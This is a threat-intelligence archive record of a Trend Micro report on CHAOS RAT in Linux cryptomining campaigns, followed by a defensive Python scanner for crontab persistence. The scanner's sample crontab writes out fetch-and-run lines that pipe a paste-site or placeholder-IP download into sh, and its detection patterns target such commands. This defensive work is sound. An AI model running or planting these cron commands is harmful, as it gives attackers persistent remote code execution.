{
	"id": "88402e4d-c880-4bbe-85cd-fd54bc38a6d8",
	"created_at": "2026-04-06T00:06:16.13478Z",
	"updated_at": "2026-04-10T13:12:40.196106Z",
	"deleted_at": null,
	"sha1_hash": "3f9a7519b26ef1973f005d4d59806688e4f36b19",
	"title": "Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 205985,
	"plain_text": "Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT\r\nBy: David Fiser, Alfredo Oliveira. Dec 12, 2022. Read time: 3 min (744 words)\r\nPublished: 2022-12-12 · Archived: 2026-04-02 12:25:32 UTC\r\nWe’ve previously written about cryptojacking scenarios involving Linux machines and specific cloud computing instances being targeted by threat actors active in this space, such as TeamTNT. We found that the routines and chain of events were fairly similar even when different threat actors were involved: in the initial phase, attackers tried to kill off competing malware, security products, and other cloud middleware. This was followed by routines for persistence and payload execution, the payload in most cases being a Monero (XMR) cryptocurrency miner. In more sophisticated threats, we also observed capabilities that allowed the malware to spread to more devices.\r\nIn November 2022, we intercepted a threat with a slightly different routine that incorporated an advanced remote access trojan (RAT) named CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which is based on an open source project.\r\nNote that the original flow, involving the termination of competing malware such as Kinsing and the killing of processes that affect cryptocurrency mining performance, remained unchanged.\r\nThe malware achieves persistence by altering /etc/crontab, the configuration file of the UNIX task scheduler cron; in this case, the cron entry re-downloads the malware from Pastebin every 10 minutes.\r\nFigure 2. Achieving persistence using cron and shell scripts downloaded from Pastebin\r\nThis is followed by the download of additional payloads: an XMRig miner, its configuration file, a shell script that loops as a “competition killer,” and, most importantly, the RAT itself.\r\nThe main downloader script and the further payloads are hosted in different locations to ensure that the campaign remains active and keeps spreading. The scripts show that the main server, which is also used for downloading payloads, appears to be located in Russia; historical WHOIS data shows that it was also used for cloud bulletproof hosting, a modus operandi previously employed by hacking teams that used open source tools and focused their attacks on cloud infrastructure, containers, and Linux environments.\r\nThis command-and-control (C&C) server is used only for providing payloads; Chaos RAT connects to another C&C server, likely located in Hong Kong (determined through IP geolocation). When running, the RAT client connects to the C&C server at its configured address and default port, using a JSON Web Token (JWT) for authorization.\r\nUpon connection and successful authorization, the client sends detailed information about the infected machine to the C&C server using the /device command.\r\nThe RAT is a Go-compiled binary with the following functions:\r\nPerform reverse shell\r\nDownload files\r\nUpload files\r\nDelete files\r\nTake screenshots\r\nAccess file explorer\r\nGather operating system information\r\nRestart the PC\r\nShut down the PC\r\nOpen a URL\r\nFigure 5. Some of the implemented functions that can be sent to a connected machine via the C&C server\r\nAn interesting trait of the malware family we intercepted is that the address and access token are passed as compilation flags and hardcoded inside the RAT client, replacing the values of the corresponding variables in the main code.\r\nFigure 8. The address and access token being passed as compilation flags and hardcoded inside the RAT client\r\nConclusion\r\nOn the surface, the incorporation of a RAT into the infection routine of cryptocurrency mining malware might seem relatively minor. However, given the tool’s array of functions, and given that this evolution shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals stay extra vigilant when it comes to security. In our research on cloud-based cryptocurrency mining groups, we provided several concrete measures and best practices that enterprises can implement to help strengthen their defensive posture.\r\nOrganizations can also consider cloud security technologies such as Trend Micro Cloud One™ – Workload Security, which helps defend systems against vulnerability exploits, malware, and unauthorized change. Using techniques such as machine learning (ML) and virtual patching, it can automatically secure new and existing workloads against both known and unknown threats.\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html"
	],
	"report_names": [
		"linux-cryptomining-enhanced-via-chaos-rat-.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-10T02:00:03.240002Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-10T02:00:05.264841Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433976,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.pdf",
		"text": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.txt",
		"img": "https://archive.orkl.eu/3f9a7519b26ef1973f005d4d59806688e4f36b19.jpg"
	}
}
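The persistence mechanism the report above describes (an /etc/crontab entry that re-fetches the dropper from Pastebin every 10 minutes, which then pulls down XMRig, the competition killer and the RAT) is a pattern a defender can hunt for directly in the crontab. The scanner below is an added example, not code from the Trend Micro report or from the CHAOS RAT project: it parses system-crontab lines and flags jobs that fetch from a paste site or pipe a download into a shell, and notes how often such a job re-runs. The sample crontab, the pastebin URL, the 198.51.100.7 address (TEST-NET-2) and the extra paste hosts in the watch list are constructed for the example.

```python
"""Hunt for download-and-execute persistence in /etc/crontab.
Added example, not code from the Trend Micro report or the CHAOS RAT project."""
import re
from dataclasses import dataclass
from typing import List, Optional

# pastebin.com is the host named in the report; the others are an assumption
# added here to show how the watch list would be extended.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com", "ghostbin.com")
FETCHER = re.compile(r"\b(?:curl|wget|fetch)\b")
# Download piped into a shell, or a shell run on a file in a scratch directory.
RUNNER = re.compile(r"\|\s*(?:ba|da|z)?sh\b"
                    r"|\b(?:ba|da|z)?sh\s+\S*(?:/tmp/|/var/tmp/|/dev/shm/)")
URL_HOST = re.compile(r"https?://([^/\s:]+)", re.IGNORECASE)
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
SPECIAL = {"@hourly": 60, "@daily": 1440, "@midnight": 1440, "@weekly": 10080,
           "@monthly": 43200, "@yearly": 525600, "@annually": 525600}


@dataclass
class Finding:
    line_no: int
    user: str
    command: str
    reasons: List[str]


def parse_system_crontab(text: str) -> List[tuple]:
    """Return (line_no, schedule, user, command) per job. The system crontab,
    unlike per-user crontabs, carries a user field before the command."""
    jobs = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGN.match(line):
            continue  # blank, comment, or environment assignment
        if line.startswith("@"):  # @hourly, @reboot, ...
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((no, parts[0], parts[1], parts[2]))
        else:
            parts = line.split(None, 6)
            if len(parts) == 7:
                jobs.append((no, " ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def minute_interval(schedule: str) -> Optional[int]:
    """Approximate minutes between runs; None when the job is not a simple
    repeat-by-minute job (e.g. @reboot, or an hour field other than *)."""
    if schedule.startswith("@"):
        return SPECIAL.get(schedule)
    minute, hour = schedule.split()[:2]
    if hour != "*":
        return None
    if minute == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute)
    if step:
        return int(step.group(1))
    if re.fullmatch(r"\d+(?:,\d+)*", minute):
        return 60 // len(minute.split(","))  # fixed minutes within each hour
    return None


def assess(no: int, schedule: str, user: str, command: str) -> Optional[Finding]:
    """Return a Finding only when the job looks like a fetch-and-run loop."""
    reasons = []
    hosts = [h.lower() for h in URL_HOST.findall(command)]
    paste = [h for h in hosts if any(h == p or h.endswith("." + p) for p in PASTE_HOSTS)]
    if paste:
        reasons.append(f"fetches from paste site {paste[0]}")
    if FETCHER.search(command) and RUNNER.search(command):
        reasons.append("downloads and executes in one line")
    if not reasons:
        return None
    interval = minute_interval(schedule)
    if interval is not None and interval <= 15:
        reasons.append(f"re-runs every {interval} min (re-infection loop)")
    if user == "root":
        reasons.append("runs as root")
    return Finding(no, user, command, reasons)


def scan(crontab_text: str) -> List[Finding]:
    return [f for f in (assess(*job) for job in parse_system_crontab(crontab_text)) if f]


# Constructed sample: two stock Debian jobs, one benign local script, and two
# entries shaped like the persistence in the report. URL, IP and paths are made up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/10 * * * * root curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
@hourly root wget -q -O /tmp/.x http://198.51.100.7/update.sh && sh /tmp/.x
*/5 * * * * root /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_CRONTAB):
        print(f"line {f.line_no} ({f.user}): {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run as a script it prints the two suspicious entries; in practice, feed scan() the contents of /etc/crontab and each file under /etc/cron.d. Per-user crontabs (crontab -l) have no user field, so they need a five-field variant of the parser. The check is a heuristic: a legitimate job that downloads and runs a script will also match, so a finding is a lead to triage, not a verdict.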